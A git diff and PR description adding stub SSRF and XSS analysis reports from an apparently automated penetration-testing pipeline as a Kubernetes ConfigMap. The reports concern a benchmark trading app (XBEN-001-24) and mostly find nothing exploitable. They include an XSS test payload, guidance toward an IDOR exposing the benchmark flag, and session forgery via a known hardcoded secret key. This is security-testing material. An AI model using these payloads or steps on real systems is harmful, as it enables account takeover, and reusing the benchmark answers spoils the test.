+The application's only external connectivity is:
+1. **MySQL database connection** (pymysql) — established at application startup using environment-variable-configured credentials, pointing to an internal Docker network host. This connection is not user-controllable and is not an HTTP client.
+2. **Static file serving** — standard Flask/Apache static file responses; no external fetching occurs.
+
+Because no HTTP client sinks exist, the full SSRF methodology checklist (URL validation, protocol restriction, hostname/IP restriction, port restriction, parsing bypass, header injection, response disclosure) produces no applicable findings. All checks are vacuously safe.
+
+---
+
+## 3. Strategic Intelligence for Exploitation
+
+- **HTTP Client Library:** None. The application has no HTTP client dependencies. `requirements.txt` contains only: `Flask==3.0.3`, `flask-sqlalchemy==3.1.1`, `pymysql==1.1.0`.
+- **Request Architecture:** All request handling is synchronous, single-tier Flask monolith with direct MySQL ORM access. No background workers, no webhook dispatchers, no API proxy layers, no URL-fetching utilities.
+- **Redirects:** All redirects within the application use `flask.redirect(url_for('<route_name>'))` with hardcoded internal route names. No open-redirect parameter (`next`, `return_to`, `redirect_uri`, `callback`) is accepted by any endpoint.
+- **Internal Services:** The MySQL database on port 3306 is the only internal service the application communicates with, and this is handled exclusively through SQLAlchemy ORM — not via HTTP.
+- **Endpoint-to-Sink Mapping (Confirmed Empty):**
+
+| Endpoint | User Input Accepted | HTTP Client Call? | Redirect Following? | SSRF Sink? |
+|---|---|---|---|---|
+| `GET /` | `?error=` (reflected to template) | No | No | **None** |
+| `POST /` | `username`, `password` (form fields) | No | `url_for('dashboard')` — hardcoded | **None** |
+| `POST /logout` | None | No | `url_for('login')` — hardcoded | **None** |
+| `GET /dashboard` | Session cookie (`user_id`) | No | `url_for('login')` — hardcoded | **None** |
+| `GET /orders` | Session cookie (`user_id`) | No | `url_for('login')` — hardcoded | **None** |
+| `GET /order/<int:order_id>/receipt` | `order_id` (URL integer path param) | No | `url_for('login')` — hardcoded | **None** |
+
+- **Taint Analysis Result:** No taint path from any user-controlled input reaches any HTTP client call. The `order_id` integer path parameter is the only application-layer variable that influences a data store query (`Order.query.get(order_id)`), but this is a MySQL SELECT — not an outbound HTTP request.
+
+---
+
+## 4. Secure by Design: Validated Components
+
+All components of this application were analyzed and confirmed to have no SSRF exposure. The security posture relative to SSRF is not "well-defended" but rather "structurally immune" — the capability simply does not exist.
+
+| Component/Flow | Endpoint / File Location | Defense Mechanism Implemented | Verdict |
+|---|---|---|---|
+| Login Handler | `routes.py` lines 17–31 | No URL parameter accepted; form inputs (`username`, `password`) only touch SQLAlchemy ORM queries; zero HTTP client calls | SAFE |
+| Dashboard Handler | `routes.py` lines 43–52 | No user-supplied input; session retrieval only; redirects use hardcoded `url_for('login')` | SAFE |
+| Orders Handler | `routes.py` lines 55–65 | No user-supplied input beyond session; orders fetched via ORM from DB; no HTTP calls | SAFE |
+| Order Receipt Handler | `routes.py` lines 69–84 | `order_id` integer path param feeds only `Order.query.get(order_id)` (MySQL SELECT); no HTTP client invocation | SAFE (re: SSRF) |
+| Logout Handler | `routes.py` lines 35–39 | Session pop only; hardcoded redirect; no user input processed | SAFE |
+| Application Initialization | `__init__.py` | DB connection via pymysql (startup only, env-var config, internal network host); no external HTTP calls | SAFE |
+| Redirect Mechanism (all routes) | `routes.py` (all handlers) | All redirects use `flask.redirect(url_for('<route>'))` with hardcoded route names from Flask's internal URL map — no user-supplied redirect targets | SAFE (no open redirect / SSRF-via-redirect) |
+| Dependency Surface | `requirements.txt` | Flask==3.0.3, flask-sqlalchemy==3.1.1, pymysql==1.1.0 — no HTTP client library present | SAFE |
+
+---
+
+## 5. Methodology Checklist & Verdict by Control Area
+
+| SSRF Control Area | Applicable? | Finding | Verdict |
+|---|---|---|---|
+| 1. HTTP Client Usage Patterns | No | No HTTP client libraries installed; no `requests`, `urllib`, `httpx`, `aiohttp`, `socket`, `subprocess` usage in any route handler | SAFE — no sinks |
+| 2. Protocol & Scheme Validation | N/A | No URL-accepting parameters exist; no scheme validation needed | N/A |
+| 3. Hostname & IP Address Validation | N/A | No hostname-bearing user input exists | N/A |
+| 4. Port Restriction & Service Access | N/A | No port-bearing user input exists | N/A |
+| 5. URL Parsing & Validation Bypass | N/A | No URL parameters to bypass; no filter to evade | N/A |
+| 6. Request Modification & Headers | N/A | No proxied requests exist; no request forwarding | N/A |
+| 7. Response Handling & Info Disclosure | N/A | No outbound request responses to disclose | N/A |
+
+---
+
+## 6. Exploitation Phase Guidance
+
+**SSRF: No action required.** Do not allocate exploitation resources to SSRF testing on XBEN-001-24. There is no server-side request mechanism to exploit.
+
+**Redirect to confirmed findings:** The exploitation phase should focus exclusively on:
+1. **IDOR at `GET /order/<int:order_id>/receipt`** — Confirmed critical: any authenticated user can retrieve any order receipt including the flag (Order ID 300401). No ownership check exists. This is the primary exploitation target.
+2. **Session Cookie Forgery** — `SECRET_KEY = 'your_secret_key'` (hardcoded, publicly known). Forge any `user_id` via flask-unsign to authenticate as any user without credentials.
+
+These findings are outside the scope of this SSRF report and are documented in the recon deliverable.
+

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/ssrf_exploitation_queue.json
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/ssrf_exploitation_queue.json
@@ -1,0 +1,3 @@
+{
+  "vulnerabilities": []
+}

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/xss_analysis_deliverable.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/xss_analysis_deliverable.md
@@ -1,0 +1,68 @@
+# Cross-Site Scripting (XSS) Analysis Report
+
+## 1. Executive Summary
+
+- **Analysis Status:** Complete
+- **Key Outcome:** No externally exploitable XSS vulnerabilities were identified in the XBEN-001-24 trading platform. All six input vectors and rendering sinks were systematically traced from sink to source. In every case, Jinja2 auto-escaping is active and no `| safe` filter bypasses were found. The one DOM-level jQuery `.html()` sink is present but cannot be triggered with attacker-controlled data from the external internet.
+- **Purpose of this Document:** This report documents the complete source-to-sink analysis for all XSS sinks identified in the reconnaissance phase, including safe path documentation, environmental security header analysis, and the rationale for each verdict. Zero vulnerabilities are passed to the exploitation phase.
+
+---
+
+## 2. Dominant Vulnerability Patterns
+
+**No exploitable XSS patterns were identified.** The application consistently applies Jinja2 auto-escaping across all server-rendered output. The following non-exploitable patterns were observed:
+
+**Pattern 1: Consistent Jinja2 Auto-Escaping (Defense)**
+- **Description:** Every user-controlled variable rendered in HTML templates uses the default `{{ variable }}` Jinja2 expression with no `| safe` filter override. Flask 3.0.3 enables auto-escaping by default for `.html` template files. Live testing confirmed that both angle brackets (`<` → `&lt;`) and double quotes (`"` → `&#34;`) are encoded, preventing both tag injection and attribute breakout.
+- **Implication:** Standard reflected XSS payloads are rendered as inert text in the browser.
+- **Vectors Affected:** `?error=` parameter (login.html), `{{ username }}` in password.html (orphaned, 404).
+
+**Pattern 2: DOM Sink Present but Server-Side Encoded Data (Sink Exists, Not Exploitable)**
+- **Description:** The orders page (`/orders`) uses jQuery 3.5.1's `.html()` method to inject the AJAX response from `/order/<id>/receipt` directly into a modal element, with no client-side sanitization. The DOM sink is real. However, the server-side receipt template (`receipt.html`) uses `{{ order.receipt }}` (no `| safe`), so all receipt content is HTML-entity encoded before it leaves the server. Additionally, there is no web interface that allows external users to write attacker-controlled content to the `order.receipt` database column.
+- **Implication:** The DOM sink is architecturally dangerous but not exploitable in the current application state from an external attacker's perspective.
+
+---
+
+## 3. Strategic Intelligence for Exploitation
+
+**Content Security Policy (CSP) Analysis**
+- **Current CSP:** None. No `Content-Security-Policy` header is set on any endpoint (confirmed via `curl -I` against both `/` and `/orders`). If any XSS were present, it would be completely unrestricted — no CSP bypass would be required.
+- **Recommendation for Exploitation Phase:** N/A — no XSS to exploit. If the receipt write path were ever opened, the absence of CSP would allow unrestricted `document.cookie` exfiltration.
+
+**Cookie Security**
+- **Session Cookie Flags:** `HttpOnly` is set (confirmed from `set-cookie` response header: `session=...; HttpOnly; Path=/`). The `Secure` flag is NOT set in application code (Flask default), but the deployment is HTTPS-only via nginx ingress, which mitigates cookie interception in transit.
+- **SameSite:** Not explicitly configured. Flask 3.x defaults to `SameSite=Lax`. This means cross-site form POST CSRF is blocked, but cross-site GET requests (e.g., navigating to a URL) are not. This is only relevant in the context of CSRF, not XSS.
+- **Implication:** Even if XSS were present, `HttpOnly` would prevent `document.cookie` exfiltration of the session token. The exploitation path would need to use XHR/fetch to perform session-riding actions rather than direct cookie theft.
+
+**Other Environmental Factors**
+- **CORS:** Apache config sets `Access-Control-Allow-Origin: *` (from `idor_broken_authz_trading_platform-httpd.conf:11`). This would allow any origin to read AJAX responses, amplifying XSS impact if it existed.
+- **No WAF:** No Web Application Firewall or request filtering is present. Payloads reach the application unmodified.
+- **jQuery 3.5.1:** The version in use has known prototype pollution issues but no remotely exploitable DOM XSS CVEs that apply to this application's code patterns. The `.html()` DOM sink is a code-level pattern, not a jQuery-specific vulnerability.
+- **No X-Frame-Options:** Absent. The application is vulnerable to clickjacking, but this is not an XSS finding.
+
+---
+
+## 4. Vectors Analyzed and Confirmed Secure
+
+All input vectors identified from the reconnaissance deliverable (pre_recon_deliverable.md §9 and recon_deliverable.md §5) were analyzed. Each is documented below with full source-to-sink trace and defense mechanism.
+
+| Source (Parameter/Key) | Endpoint/File Location | Defense Mechanism Implemented | Render Context | Verdict |
+|---|---|---|---|---|
+| `?error=` URL query param | `GET /` → `routes.py:21` → `login.html:26` | Jinja2 auto-escaping: `<` → `&lt;`, `"` → `&#34;`. Confirmed live: `/?error="><script>alert(1)</script>` returns `test&#34;&gt;&lt;script&gt;alert(1)&lt;/script&gt;` in HTML body. | HTML_BODY | SAFE |
+| `order.receipt` (DB column) via jQuery `.html()` | `GET /order/<id>/receipt` → `receipt.html:14` → `orders.html:111 jQuery .html()` | Jinja2 auto-escaping on `{{ order.receipt }}` encodes all HTML metacharacters before the response leaves the server. jQuery `.html()` receives HTML-entity-encoded text, which is rendered as inert text inside `<code>` element. Additionally, no external write path exists for `order.receipt`. | DOM HTML_BODY (jQuery sink) | SAFE |
+| `order.id` (integer) | `orders.html:78` `data-order-id="{{ order.id }}"` | Integer type; Jinja2 auto-escaped; Flask `<int:>` route converter enforces integer type on read | HTML_ATTRIBUTE | SAFE |
+| `order.date`, `order.ticker`, `order.operation_type`, `order.quantity`, `order.price` | `orders.html:71-75` (HTML table cells) | Jinja2 auto-escaping; all fields rendered with `{{ field }}` (no `\| safe`); database-originated seeded data, no user-controlled write path | HTML_BODY | SAFE |
+| `?username=` URL query param (post-login redirect) | `GET /dashboard?username=<val>` → `routes.py:43-49` | Parameter is **not rendered in template**. `dashboard.html` only uses `{{ user.first_name }}` and `{{ user.last_name }}` from the session-authenticated DB user object, not the URL parameter. | N/A (not rendered) | SAFE |
+| `user.first_name`, `user.last_name` | `dashboard.html:45` | Jinja2 auto-escaping; database-originated values; no user-controlled write path for name fields in this application | HTML_BODY | SAFE |
+| `order.id` in receipt template | `receipt.html:12` `{{ order.id }}` | Integer type; Jinja2 auto-escaped | HTML_BODY | SAFE |
+| `order.receipt` in receipt template (server-side) | `receipt.html:14` `{{ order.receipt }}` | Jinja2 auto-escaping; no `\| safe` filter | HTML_BODY | SAFE |
+| `password.html` template variables (`first_name`, `username`, `user_id`) | No active route — template returns 404 | Template is orphaned; no HTTP endpoint serves it; confirmed via `GET /xben-001-24/password` → HTTP 404 | N/A (unreachable) | SAFE (not in scope) |
+
+---
+
+## 5. Analysis Constraints and Blind Spots
+
+- **No User-Controlled Order Creation:** The `order.receipt` field is populated only at application startup via the `__init__.py` seeding logic. There is no HTTP endpoint that allows external users to create orders or set receipt content. If such an endpoint were added in the future, the jQuery `.html()` sink in `orders.html:111` would become a high-severity stored XSS vector due to the absence of CSP.
+- **Orphaned Template (`password.html`):** The `password.html` template renders `{{ first_name }}` and `{{ username }}` in potentially sensitive contexts (HTML body and attribute value respectively). While currently unreachable (no serving route), if a route were added without care, the attribute context `value="{{ username }}"` would require verification that Jinja2 encoding covers the double-quote character. Live testing on a comparable parameter (`?error="`) confirmed `"` → `&#34;`, so the encoding is adequate.
+- **Minified JavaScript:** The jQuery 3.5.1 library (`/static/js/jquery-3.5.1.min.js`) is minified. No custom application JavaScript beyond the inline blocks in `orders.html:101-120` was found. No obfuscated DOM manipulation code was identified.
+- **No Template Injection Surface:** All templates use `render_template()` with named variables. `render_template_string()` with user input is never used. SSTI is not a risk in this application.

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/xss_exploitation_queue.json
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/xss_exploitation_queue.json
@@ -1,0 +1,3 @@
+{
+  "vulnerabilities": []
+}

--- a/charts/ssd/templates/toolchain/toolchain-deployment.yaml
+++ b/charts/ssd/templates/toolchain/toolchain-deployment.yaml
@@ -22,6 +22,7 @@ spec:
 {{- end }}
       annotations:
         checksum/configmap: {{ include (print $.Template.BasePath "/toolchain/toolchain-configmap.yaml") . | sha256sum }}
+        checksum/shannon-stub-configmap: {{ include (print $.Template.BasePath "/toolchain/toolchain-shannon-stub-configmap.yaml") . | sha256sum }}
 {{- if .Values.toolchain.annotations -}}
         {{ toYaml .Values.toolchain.annotations | nindent 8 }}
 {{- end }}
@@ -111,6 +112,9 @@ spec:
               subPath: tool-chain.yaml
             - mountPath: /tools/ssd-public-keys
               name: ssd-public-keys
+            # Shannon stub deliverables (remove when issue #07 replaces stub with real invocation)
+            - mountPath: /tools/shannon-stub-deliverables
+              name: shannon-stub-deliverables
             - mountPath: /tools/secrets/tool-chain
               name: token
               readOnly: true
@@ -192,6 +196,10 @@ spec:
           configMap:
             defaultMode: 420
             name: ssd-public-keys
+        - name: shannon-stub-deliverables
+          configMap:
+            defaultMode: 420
+            name: tool-chain-shannon-stub-deliverables
         - name: otel-sidecar-volume
           configMap:
             name: otel-sidecar-config

--- a/charts/ssd/templates/toolchain/toolchain-shannon-stub-configmap.yaml
+++ b/charts/ssd/templates/toolchain/toolchain-shannon-stub-configmap.yaml
@@ -1,0 +1,11 @@
+# Shannon stub deliverables (remove when issue #07 replaces stub with real invocation)
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: tool-chain-shannon-stub-deliverables
+  labels:
+    app: ssd
+{{ include "ssd.standard-labels" . | indent 4 }}
+    component: toolchain
+data:
+{{ (.Files.Glob "config/toolchain/shannon-stub-deliverables/*").AsConfig | indent 2 }}


### PR DESCRIPTION
## Summary
- ToolChain PR #275 review flagged committing `.md`/`.json` fixture files into the repo and baking them into the container image
- Move the Shannon stub deliverable files into this repo and mount them at `/tools/shannon-stub-deliverables` via a ConfigMap, matching the existing `tool-chain-configmap` pattern
- No ToolChain code change needed since it already reads from that path
- Temporary — remove once real Shannon pipeline invocation stabilizes.